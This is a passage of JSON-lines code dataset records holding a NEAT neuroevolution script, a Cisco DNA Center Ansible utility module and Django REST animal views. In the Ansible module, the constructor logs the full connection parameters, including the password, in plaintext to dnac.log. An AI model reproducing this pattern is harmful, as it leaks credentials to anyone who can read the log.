+ f\", in parallel...\", flush=True)\n results = self.pool.map(run_sim_episodes, jobs)\n else:\n print(msg + \", serially...\", flush=True)\n results = map(run_sim_episodes, jobs)\n\n for i, episodes in enumerate(results):\n genome = nets[i][0]\n scores = [ep.rewards.sum() for ep in episodes]\n genome.fitness = sum(scores) / gym_config.num_fitness_episodes\n self.test_episodes.extend(episodes)\n\n def evaluate_genomes(self, genomes, config):\n self.generation += 1\n config.update_schedules(self.generation)\n\n t0 = time.time()\n nets = [(g, neat.nn.FeedForwardNetwork.create(g, config)) for gid, g in genomes]\n print(f\"Time to create {len(nets)} networks: {time.time() - t0:.2f}s\")\n t0 = time.time()\n\n # Periodically generate a new set of episodes for comparison. However, if we are using the score as part of the\n # fitness computation (`fitness_weight > 0`), then we always need to run this part.\n if config.gym_config.fitness_weight > 0 or self.generation % config.gym_config.new_episode_rate == 1:\n # Keep the episodes from the past two generations.\n num_to_keep = 2 * len(nets) * config.gym_config.num_fitness_episodes\n self.test_episodes = self.test_episodes[-num_to_keep:]\n self.simulate(nets, config.gym_config)\n print(f\"Simulation run time: {time.time() - t0:.2f}s\")\n t0 = time.time()\n\n if config.gym_config.reward_prediction_weight > 0.0:\n # Assign a composite fitness to each genome; genomes can make progress either\n # by improving their total reward or by making more accurate reward estimates.\n msg = f\"Evaluating {len(nets)} nets on {len(self.test_episodes)} test episodes\"\n jobs = [(genome, net, self.test_episodes, config.gym_config.reward_range,\n config.genome_config.use_reward_discount) for genome, net in nets]\n if self.pool:\n print(msg + f\", in parallel...\")\n results = self.pool.map(compute_reward_prediction_error, jobs)\n else:\n print(msg + \", serially...\")\n results = map(compute_reward_prediction_error, jobs)\n for i, pred_error in enumerate(results):\n genome = nets[i][0]\n if config.gym_config.fitness_weight > 0:\n genome.fitness = (config.gym_config.fitness_weight * genome.fitness -\n config.gym_config.reward_prediction_weight * pred_error)\n else:\n genome.fitness = -config.gym_config.reward_prediction_weight * pred_error\n\n print(f\"Reward prediction compute time: {time.time() - t0:.2f}s\\n\")\n\n # NOTE: This is a hack needed for running in batch mode in Slurm, because multiprocessing seems to prevent\n # automatic flushing.\n sys.stderr.flush()\n sys.stdout.flush()\n\n\ndef run_evolution(config, result_dir, proc=None):\n \"\"\"\n Run until the winner from a generation is able to solve the environment or the user interrupts the process.\n \"\"\"\n env = None\n pool = None\n stats = None\n best_genomes = None\n\n try:\n print(f'Creating Gym environment \"{config.gym_config.env_id}\".')\n env = gym.make(config.gym_config.env_id)\n num_proc = NUM_CORES if proc is None else proc\n if num_proc > 1:\n print(f\"Spawning a pool of {num_proc} processes.\")\n t0 = time.time()\n pool = multiprocessing.Pool(num_proc)\n print(f\"Time to create process pool: {time.time() - t0:.2f}s\", flush=True)\n else:\n pool = None\n ec = PooledErrorCompute(config.gym_config, pool)\n\n pop = neat.Population(config)\n stats = reporters.StatisticsReporter(pop)\n pop.add_reporter(stats)\n pop.add_reporter(neat.StdOutReporter(True))\n # Checkpoint every 25 generations or 900 seconds.\n pop.add_reporter(neat.Checkpointer(25, 900))\n\n steps_between_eval = config.gym_config.steps_between_eval\n\n while ec.generation < config.gym_config.max_steps:\n gen_best = pop.run(ec.evaluate_genomes, steps_between_eval)\n\n # print(gen_best)\n\n visualize.plot_fitness(stats, savepath=result_dir / \"fitness.svg\")\n visualize.plot_species(stats, savepath=result_dir / \"speciation.svg\")\n\n mfs = np.mean(stats.get_fitness_mean()[-steps_between_eval:])\n print(f\"Average mean fitness over last {steps_between_eval} generations: {mfs}\")\n mfs = np.mean(stats.get_fitness_stat(max)[-steps_between_eval:])\n print(f\"Average max fitness over last {steps_between_eval} generations: {mfs}\")\n\n # Evaluate the best genomes seen so far.\n best_genomes = stats.best_unique_genomes(config.gym_config.num_best)\n best_networks = [neat.nn.FeedForwardNetwork.create(g, config) for g in best_genomes]\n\n # If we want to evaluate as an ensemble, just make this a list of one list, so all networks are used\n # together in one ensemble.\n if config.gym_config.eval_ensemble:\n best_networks = [best_networks]\n\n solved = [True] * len(best_networks)\n for i, net in enumerate(best_networks):\n ensemble_text = f\" (ensemble of {len(net)} networks)\" if isinstance(net, list) else \"\"\n print(f\"Testing network {i}\" + ensemble_text + \"...\")\n scores = []\n for k in range(config.gym_config.num_evals):\n observation, _ = env.reset()\n score = 0\n step = 0\n done = False\n while not done:\n step += 1\n # Use the total reward estimates from all the best networks to\n # determine the best action given the current state.\n _, _, observation, reward, done, _ = take_step(env, observation, net)\n score += reward\n if not os.environ.get(\"HEADLESS\"):\n env.render()\n\n scores.append(score)\n avg_score = np.mean(scores)\n print(f\" Test Episode {k}: score = {score}, avg so far = {avg_score}\")\n if score < config.gym_config.score_threshold:\n # We must always get above the threshold, else stop early and decide we aren't solved yet.\n solved[i] = False\n break\n\n # NOTE: This is a hack needed for running in batch mode in Slurm, because multiprocessing seems to prevent\n # automatic flushing.\n sys.stderr.flush()\n sys.stdout.flush()\n\n if np.any(solved):\n msg = \"Solved by: \"\n for i, s in enumerate(solved):\n if s:\n msg += f\"winner-{best_networks[i]}, \"\n print(msg[:-2])\n return best_genomes\n\n # end while\n print(\"Reached maximum number of generations.\")\n\n except KeyboardInterrupt:\n print(\"User requested termination.\")\n\n finally:\n if stats:\n df = stats.to_pandas()\n if df is not None:\n df.to_pickle(result_dir / \"generations.pkl\")\n if env:\n env.close()\n if pool:\n pool.terminate()\n pool.join()\n\n return best_genomes\n\n\ndef main(argv=None):\n parser = argutils.create_parser(__doc__)\n argutils.add_experiment_args(parser)\n args = parser.parse_args(argv)\n argutils.resolve_experiment_args(parser, args, __file__)\n\n config = make_config(args.config)\n result_path = args.results_dir.resolve()\n result_path.mkdir(parents=True, exist_ok=True)\n print(f\"Using result path: {result_path}\")\n\n best_genomes = run_evolution(config, result_path, args.proc)\n\n # Save the winners.\n if best_genomes:\n print(f\"Saving the {len(best_genomes)} best genomes.\")\n for n, g in enumerate(best_genomes):\n name = f\"winner-{n}\"\n with open(result_path / f\"{name}.pkl\", \"wb\") as f:\n pickle.dump(g, f)\n\n visualize.draw_net(config, g, view=False, savepath=result_path / f\"{name}-net.gv\")\n visualize.draw_net(config, g, view=False, savepath=result_path / f\"{name}-net-pruned.gv\", prune_unused=True)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"ntraft/synaptic-exuberance","sub_path":"gymex/evolve.py","file_name":"evolve.py","file_ext":"py","file_size_in_byte":13572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37932171815","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\ntry:\n from dnacentersdk import api, exceptions\nexcept ImportError:\n DNAC_SDK_IS_INSTALLED = False\nelse:\n DNAC_SDK_IS_INSTALLED = True\nfrom ansible.module_utils._text import to_native\nfrom ansible.module_utils.common import validation\nfrom abc import ABCMeta, abstractmethod\ntry:\n import logging\nexcept ImportError:\n LOGGING_IN_STANDARD = False\nelse:\n LOGGING_IN_STANDARD = True\nimport os.path\nimport copy\nimport datetime\nimport inspect\n\n\nclass DnacBase():\n\n \"\"\"Class contains members which can be reused for all intent modules\"\"\"\n\n __metaclass__ = ABCMeta\n\n def __init__(self, module):\n self.module = module\n self.params = module.params\n self.config = copy.deepcopy(module.params.get(\"config\"))\n self.have = {}\n self.want = {}\n self.validated_config = []\n self.msg = \"\"\n self.status = \"success\"\n dnac_params = self.get_dnac_params(self.params)\n self.dnac = DNACSDK(params=dnac_params)\n self.dnac_apply = {'exec': self.dnac._exec}\n self.get_diff_state_apply = {'merged': self.get_diff_merged,\n 'deleted': self.get_diff_deleted,\n 'replaced': self.get_diff_replaced,\n 'overridden': self.get_diff_overridden,\n 'gathered': self.get_diff_gathered,\n 'rendered': self.get_diff_rendered,\n 'parsed': self.get_diff_parsed\n }\n self.dnac_log = dnac_params.get(\"dnac_log\")\n log(str(dnac_params))\n self.supported_states = [\"merged\", \"deleted\", \"replaced\", \"overridden\", \"gathered\", \"rendered\", \"parsed\"]\n self.result = {\"changed\": False, \"diff\": [], \"response\": [], \"warnings\": []}\n\n @abstractmethod\n def validate_input(self):\n pass\n\n def get_diff_merged(self):\n # Implement logic to merge the resource configuration\n self.merged = True\n return self\n\n def get_diff_deleted(self):\n # Implement logic to delete the resource\n self.deleted = True\n return self\n\n def get_diff_replaced(self):\n # Implement logic to replace the resource\n self.replaced = True\n return self\n\n def get_diff_overridden(self):\n # Implement logic to overwrite the resource\n self.overridden = True\n return self\n\n def get_diff_gathered(self):\n # Implement logic to gather data about the resource\n self.gathered = True\n return self\n\n def get_diff_rendered(self):\n # Implement logic to render a configuration template\n self.rendered = True\n return self\n\n def get_diff_parsed(self):\n # Implement logic to parse a configuration file\n self.parsed = True\n return True\n\n def log(self, message, frameIncrement=0):\n \"\"\"Log messages into dnac.log file\"\"\"\n\n if self.dnac_log:\n message = \"Module: \" + self.__class__.__name__ + \", \" + message\n log(message, (1 + frameIncrement))\n\n def check_return_status(self):\n \"\"\"API to check the return status value and exit/fail the module\"\"\"\n\n self.log(\"status: {0}, msg:{1}\".format(self.status, self.msg), frameIncrement=1)\n if \"failed\" in self.status:\n self.module.fail_json(msg=self.msg, response=[])\n elif \"exited\" in self.status:\n self.module.exit_json(**self.result)\n elif \"invalid\" in self.status:\n self.module.fail_json(msg=self.msg, response=[])\n\n def get_dnac_params(self, params):\n \"\"\"Store the DNAC parameters from the playbook\"\"\"\n\n dnac_params = {\"dnac_host\": params.get(\"dnac_host\"),\n \"dnac_port\": params.get(\"dnac_port\"),\n \"dnac_username\": params.get(\"dnac_username\"),\n \"dnac_password\": params.get(\"dnac_password\"),\n \"dnac_verify\": params.get(\"dnac_verify\"),\n \"dnac_debug\": params.get(\"dnac_debug\"),\n \"dnac_log\": params.get(\"dnac_log\")\n }\n return dnac_params\n\n def get_task_details(self, task_id):\n \"\"\"Check if the task performed is sucessfull or not\"\"\"\n\n result = None\n response = self.dnac_apply['exec'](\n family=\"task\",\n function=\"get_task_by_id\",\n params={\"task_id\": task_id},\n )\n\n self.log(str(response))\n if isinstance(response, dict):\n result = response.get(\"response\")\n\n return result\n\n def reset_values(self):\n \"\"\"Reset all neccessary attributes to default values\"\"\"\n\n self.have.clear()\n self.want.clear()\n\n def get_execution_details(self, execid):\n \"\"\"\n Get the execution details of an API\n\n Parameters:\n execid (str) - Id for API execution\n\n Returns:\n response (dict) - Status for API execution\n \"\"\"\n\n self.log(\"Execution Id \" + str(execid))\n response = self.dnac._exec(\n family=\"task\",\n function='get_business_api_execution_details',\n params={\"execution_id\": execid}\n )\n self.log(\"Response for the current execution\" + str(response))\n return response\n\n def check_execution_response_status(self, response):\n \"\"\"\n Checks the reponse status provided by API in the DNAC\n\n Parameters:\n response (dict) - API response\n\n Returns:\n self\n \"\"\"\n\n self.log(str(response))\n if not response:\n self.msg = \"response is empty\"\n self.status = \"failed\"\n return self\n\n if not isinstance(response, dict):\n self.msg = \"response is not a dictionary\"\n self.status = \"failed\"\n return self\n\n executionid = response.get(\"executionId\")\n while True:\n execution_details = self.get_execution_details(executionid)\n if execution_details.get(\"status\") == \"SUCCESS\":\n self.result['changed'] = True\n self.msg = \"Successfully executed\"\n self.status = \"success\"\n break\n\n if execution_details.get(\"bapiError\"):\n self.msg = execution_details.get(\"bapiError\")\n self.status = \"failed\"\n break\n\n return self\n\n\ndef log(msg, frameIncrement=0):\n with open('dnac.log', 'a') as of:\n callerframerecord = inspect.stack()[1 + frameIncrement]\n frame = callerframerecord[0]\n info = inspect.getframeinfo(frame)\n d = datetime.datetime.now().replace(microsecond=0).isoformat()\n of.write(\"---- %s ---- %s@%s ---- %s \\n\" % (d, info.lineno, info.function, msg))\n\n\ndef is_list_complex(x):\n return isinstance(x[0], dict) or isinstance(x[0], list)\n\n\ndef has_diff_elem(ls1, ls2):\n return any((elem not in ls1 for elem in ls2))\n\n\ndef compare_list(list1, list2):\n len_list1 = len(list1)\n len_list2 = len(list2)\n if len_list1 != len_list2:\n return False\n\n if len_list1 == 0:\n return True\n\n attempt_std_cmp = list1 == list2\n if attempt_std_cmp:\n return True\n\n if not is_list_complex(list1) and not is_list_complex(list2):\n return set(list1) == set(list2)\n\n # Compare normally if it exceeds expected size * 2 (len_list1==len_list2)\n MAX_SIZE_CMP = 100\n # Fail fast if elem not in list, thanks to any and generators\n if len_list1 > MAX_SIZE_CMP:\n return attempt_std_cmp\n else:\n # not changes 'has diff elem' to list1 != list2 ':lists are not equal'\n return not (has_diff_elem(list1, list2)) or not (has_diff_elem(list2, list1))\n\n\ndef fn_comp_key(k, dict1, dict2):\n return dnac_compare_equality(dict1.get(k), dict2.get(k))\n\n\ndef dnac_compare_equality(current_value, requested_value):\n # print(\"dnac_compare_equality\", current_value, requested_value)\n if requested_value is None:\n return True\n if current_value is None:\n return True\n if isinstance(current_value, dict) and isinstance(requested_value, dict):\n all_dict_params = list(current_value.keys()) + list(requested_value.keys())\n return not any((not fn_comp_key(param, current_value, requested_value) for param in all_dict_params))\n elif isinstance(current_value, list) and isinstance(requested_value, list):\n return compare_list(current_value, requested_value)\n else:\n return current_value == requested_value\n\n\ndef simple_cmp(obj1, obj2):\n return obj1 == obj2\n\n\ndef get_dict_result(result, key, value, cmp_fn=simple_cmp):\n if isinstance(result, list):\n if len(result) == 1:\n if isinstance(result[0], dict):\n result = result[0]\n if result.get(key) is not None and result.get(key) != value:\n result = None\n else:\n result = None\n else:\n for item in result:\n if isinstance(item, dict) and (item.get(key) is None or item.get(key) == value):\n result = item\n return result\n result = None\n elif not isinstance(result, dict):\n result = None\n elif result.get(key) is not None and result.get(key) != value:\n result = None\n return result\n\n\ndef dnac_argument_spec():\n argument_spec = dict(\n dnac_host=dict(type=\"str\", required=True),\n dnac_port=dict(type=\"int\", required=False, default=443),\n dnac_username=dict(type=\"str\", default=\"admin\", aliases=[\"user\"]),\n dnac_password=dict(type=\"str\", no_log=True),\n dnac_verify=dict(type=\"bool\", default=True),\n dnac_version=dict(type=\"str\", default=\"2.2.3.3\"),\n dnac_debug=dict(type=\"bool\", default=False),\n validate_response_schema=dict(type=\"bool\", default=True),\n )\n return argument_spec\n\n\ndef validate_str(item, param_spec, param_name, invalid_params):\n \"\"\"\n This function checks that the input `item` is a valid string and confirms to\n the constraints specified in `param_spec`. If the string is not valid or does\n not meet the constraints, an error message is added to `invalid_params`.\n\n Args:\n item (str): The input string to be validated.\n param_spec (dict): The parameter's specification, including validation constraints.\n param_name (str): The name of the parameter being validated.\n invalid_params (list): A list to collect validation error messages.\n\n Returns:\n str: The validated and possibly normalized string.\n\n Example `param_spec`:\n {\n \"type\": \"str\",\n \"length_max\": 255 # Optional: maximum allowed length\n }\n \"\"\"\n\n item = validation.check_type_str(item)\n if param_spec.get(\"length_max\"):\n if 1 <= len(item) <= param_spec.get(\"length_max\"):\n return item\n else:\n invalid_params.append(\n \"{0}:{1} : The string exceeds the allowed \"\n \"range of max {2} char\".format(param_name, item, param_spec.get(\"length_max\"))\n )\n return item\n\n\ndef validate_int(item, param_spec, param_name, invalid_params):\n \"\"\"\n This function checks that the input `item` is a valid integer and conforms to\n the constraints specified in `param_spec`. If the integer is not valid or does\n not meet the constraints, an error message is added to `invalid_params`.\n\n Args:\n item (int): The input integer to be validated.\n param_spec (dict): The parameter's specification, including validation constraints.\n param_name (str): The name of the parameter being validated.\n invalid_params (list): A list to collect validation error messages.\n\n Returns:\n int: The validated integer.\n\n Example `param_spec`:\n {\n \"type\": \"int\",\n \"range_min\": 1, # Optional: minimum allowed value\n \"range_max\": 100 # Optional: maximum allowed value\n }\n \"\"\"\n\n item = validation.check_type_int(item)\n min_value = 1\n if param_spec.get(\"range_min\") is not None:\n min_value = param_spec.get(\"range_min\")\n if param_spec.get(\"range_max\"):\n if min_value <= item <= param_spec.get(\"range_max\"):\n return item\n else:\n invalid_params.append(\n \"{0}:{1} : The item exceeds the allowed \"\n \"range of max {2}\".format(param_name, item, param_spec.get(\"range_max\"))\n )\n return item\n\n\ndef validate_bool(item, param_spec, param_name, invalid_params):\n \"\"\"\n This function checks that the input `item` is a valid boolean value. If it does\n not represent a valid boolean value, an error message is added to `invalid_params`.\n\n Args:\n item (bool): The input boolean value to be validated.\n param_spec (dict): The parameter's specification, including validation constraints.\n param_name (str): The name of the parameter being validated.\n invalid_params (list): A list to collect validation error messages.\n\n Returns:\n bool: The validated boolean value.\n \"\"\"\n\n return validation.check_type_bool(item)\n\n\ndef validate_list(item, param_spec, param_name, invalid_params):\n \"\"\"\n This function checks if the input `item` is a valid list based on the specified `param_spec`.\n It also verifies that the elements of the list match the expected data type specified in the\n `param_spec`. If any validation errors occur, they are appended to the `invalid_params` list.\n\n Args:\n item (list): The input list to be validated.\n param_spec (dict): The parameter's specification, including validation constraints.\n param_name (str): The name of the parameter being validated.\n invalid_params (list): A list to collect validation error messages.\n\n Returns:\n list: The validated list, potentially normalized based on the specification.\n \"\"\"\n\n try:\n if param_spec.get(\"type\") == type(item).__name__:\n keys_list = []\n for dict_key in param_spec:\n keys_list.append(dict_key)\n if len(keys_list) == 1:\n return validation.check_type_list(item)\n\n temp_dict = {keys_list[1]: param_spec[keys_list[1]]}\n try:\n if param_spec['elements']:\n get_spec_type = param_spec['type']\n get_spec_element = param_spec['elements']\n if type(item).__name__ == get_spec_type:\n for element in item:\n if type(element).__name__ != get_spec_element:\n invalid_params.append(\n \"{0} is not of the same datatype as expected which is {1}\".format(element, get_spec_element)\n )\n else:\n invalid_params.append(\n \"{0} is not of the same datatype as expected which is {1}\".format(item, get_spec_type)\n )\n except Exception as e:\n item, list_invalid_params = validate_list_of_dicts(item, temp_dict)\n invalid_params.extend(list_invalid_params)\n else:\n invalid_params.append(\"{0} : is not a valid list\".format(item))\n except Exception as e:\n invalid_params.append(\"{0} : comes into the exception\".format(e))\n\n return item\n\n\ndef validate_dict(item, param_spec, param_name, invalid_params):\n \"\"\"\n This function checks if the input `item` is a valid dictionary based on the specified `param_spec`.\n If the dictionary does not match the expected data type specified in the `param_spec`,\n a validation error is appended to the `invalid_params` list.\n\n Args:\n item (dict): The input dictionary to be validated.\n param_spec (dict): The parameter's specification, including validation constraints.\n param_name (str): The name of the parameter being validated.\n invalid_params (list): A list to collect validation error messages.\n\n Returns:\n dict: The validated dictionary.\n \"\"\"\n\n if param_spec.get(\"type\") != type(item).__name__:\n invalid_params.append(\"{0} : is not a valid dictionary\".format(item))\n return validation.check_type_dict(item)\n\n\ndef validate_list_of_dicts(param_list, spec, module=None):\n \"\"\"Validate/Normalize playbook params. Will raise when invalid parameters found.\n param_list: a playbook parameter list of dicts\n spec: an argument spec dict\n e.g. spec = dict(ip=dict(required=True, type='bool'),\n foo=dict(type='str', default='bar'))\n return: list of normalized input data\n \"\"\"\n\n v = validation\n normalized = []\n invalid_params = []\n\n for list_entry in param_list:\n valid_params_dict = {}\n if not spec:\n # Handle the case when spec becomes empty but param list is still there\n invalid_params.append(\"No more spec to validate, but parameters remain\")\n break\n for param in spec:\n item = list_entry.get(param)\n log(str(item))\n if item is None:\n if spec[param].get(\"required\"):\n invalid_params.append(\n \"{0} : Required parameter not found\".format(param)\n )\n else:\n item = spec[param].get(\"default\")\n valid_params_dict[param] = item\n continue\n data_type = spec[param].get(\"type\")\n switch = {\n \"str\": validate_str,\n \"int\": validate_int,\n \"bool\": validate_bool,\n \"list\": validate_list,\n \"dict\": validate_dict,\n }\n\n validator = switch.get(data_type)\n if validator:\n item = validator(item, spec[param], param, invalid_params)\n else:\n invalid_params.append(\n \"{0}:{1} : Unsupported data type {2}.\".format(param, item, data_type)\n )\n\n choice = spec[param].get(\"choices\")\n if choice:\n if item not in choice:\n invalid_params.append(\n \"{0} : Invalid choice provided\".format(item)\n )\n\n no_log = spec[param].get(\"no_log\")\n if no_log:\n if module is not None:\n module.no_log_values.add(item)\n else:\n msg = \"\\n\\n'{0}' is a no_log parameter\".format(param)\n msg += \"\\nAnsible module object must be passed to this \"\n msg += \"\\nfunction to ensure it is not logged\\n\\n\"\n raise Exception(msg)\n\n valid_params_dict[param] = item\n normalized.append(valid_params_dict)\n\n return normalized, invalid_params\n\n\nclass DNACSDK(object):\n def __init__(self, params):\n self.result = dict(changed=False, result=\"\")\n self.validate_response_schema = params.get(\"validate_response_schema\")\n if DNAC_SDK_IS_INSTALLED:\n self.api = api.DNACenterAPI(\n username=params.get(\"dnac_username\"),\n password=params.get(\"dnac_password\"),\n base_url=\"https://{dnac_host}:{dnac_port}\".format(\n dnac_host=params.get(\"dnac_host\"), dnac_port=params.get(\"dnac_port\")\n ),\n version=params.get(\"dnac_version\"),\n verify=params.get(\"dnac_verify\"),\n debug=params.get(\"dnac_debug\"),\n )\n if params.get(\"dnac_debug\") and LOGGING_IN_STANDARD:\n logging.getLogger('dnacentersdk').addHandler(logging.StreamHandler())\n else:\n self.fail_json(msg=\"DNA Center Python SDK is not installed. Execute 'pip install dnacentersdk'\")\n\n def changed(self):\n self.result[\"changed\"] = True\n\n def object_created(self):\n self.changed()\n self.result[\"result\"] = \"Object created\"\n\n def object_updated(self):\n self.changed()\n self.result[\"result\"] = \"Object updated\"\n\n def object_deleted(self):\n self.changed()\n self.result[\"result\"] = \"Object deleted\"\n\n def object_already_absent(self):\n self.result[\"result\"] = \"Object already absent\"\n\n def object_already_present(self):\n self.result[\"result\"] = \"Object already present\"\n\n def object_present_and_different(self):\n self.result[\"result\"] = \"Object already present, but it has different values to the requested\"\n\n def object_modify_result(self, changed=None, result=None):\n if result is not None:\n self.result[\"result\"] = result\n if changed:\n self.changed()\n\n def is_file(self, file_path):\n return os.path.isfile(file_path)\n\n def extract_file_name(self, file_path):\n return os.path.basename(file_path)\n\n def _exec(self, family, function, params=None, op_modifies=False, **kwargs):\n try:\n family = getattr(self.api, family)\n func = getattr(family, function)\n except Exception as e:\n self.fail_json(msg=e)\n\n try:\n if params:\n file_paths_params = kwargs.get('file_paths', [])\n # This substitution is for the import file operation\n if file_paths_params and isinstance(file_paths_params, list):\n multipart_fields = {}\n for (key, value) in file_paths_params:\n if isinstance(params.get(key), str) and self.is_file(params[key]):\n file_name = self.extract_file_name(params[key])\n file_path = params[key]\n multipart_fields[value] = (file_name, open(file_path, 'rb'))\n\n params.setdefault(\"multipart_fields\", multipart_fields)\n params.setdefault(\"multipart_monitor_callback\", None)\n\n if not self.validate_response_schema and op_modifies:\n params[\"active_validation\"] = False\n\n response = func(**params)\n else:\n response = func()\n except exceptions.dnacentersdkException as e:\n self.fail_json(\n msg=(\n \"An error occured when executing operation.\"\n \" The error was: {error}\"\n ).format(error=to_native(e))\n )\n return response\n\n def fail_json(self, msg, **kwargs):\n self.result.update(**kwargs)\n raise Exception(msg)\n\n def exit_json(self):\n return self.result\n\n\ndef main():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cisco-en-programmability/dnacenter-ansible","sub_path":"plugins/module_utils/dnac.py","file_name":"dnac.py","file_ext":"py","file_size_in_byte":23003,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"21"} +{"seq_id":"15831524641","text":"from functools import partial\nfrom rest_framework.views import APIView, Request, Response, status\n\nfrom animals.models import Animal\nfrom animals.serializers import AnimalSerializer\n\n\nclass AnimalView(APIView):\n def get(self, _:Request):\n animals = Animal.objects.all()\n serialized = AnimalSerializer(instance=animals, many=True)\n\n return Response({\"animals\": serialized.data}, status.HTTP_200_OK)\n\n def post(self, req:Request):\n serialized = AnimalSerializer(data=req.data)\n print(\"antes de validar\", serialized)\n serialized.is_valid(raise_exception=True)\n serialized.save()\n\n return Response(serialized.data, status.HTTP_201_CREATED)\n\nclass AnimalIdView(APIView):\n def get(self, _:Request, animal_id):\n try:\n animal = Animal.objects.get(id=animal_id)\n serialized = AnimalSerializer(instance=animal)\n\n return Response({\"animal\": serialized.data}, status.HTTP_200_OK)\n except:\n return Response({\"error\": \"animal does not exist\"}, status.HTTP_404_NOT_FOUND)\n\n def patch(self, req:Request, animal_id):\n\n try:\n animal = Animal.objects.get(id=animal_id)\n serialized = AnimalSerializer(animal, req.data, partial=True)\n serialized.is_valid()\n\n serialized.save()\n\n return Response({\"animal\": serialized.data}, status.HTTP_200_OK)\n except ValueError as err:\n return Response(*err.args)\n except:\n return Response({\"error\": \"animal does not exist\"}, status.HTTP_404_NOT_FOUND)\n\n \n def delete(self, _:Request, animal_id):\n try:\n animal = Animal.objects.get(id=animal_id)\n animal.delete()\n\n return Response(\"\", status.HTTP_204_NO_CONTENT)\n except:\n return Response({\"error\": \"animal does not exist\"}, status.HTTP_404_NOT_FOUND)","repo_name":"Kenzie-Academy-Brasil-Developers/m5-sprint3-kenzie-pet-Kurein","sub_path":"animals/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}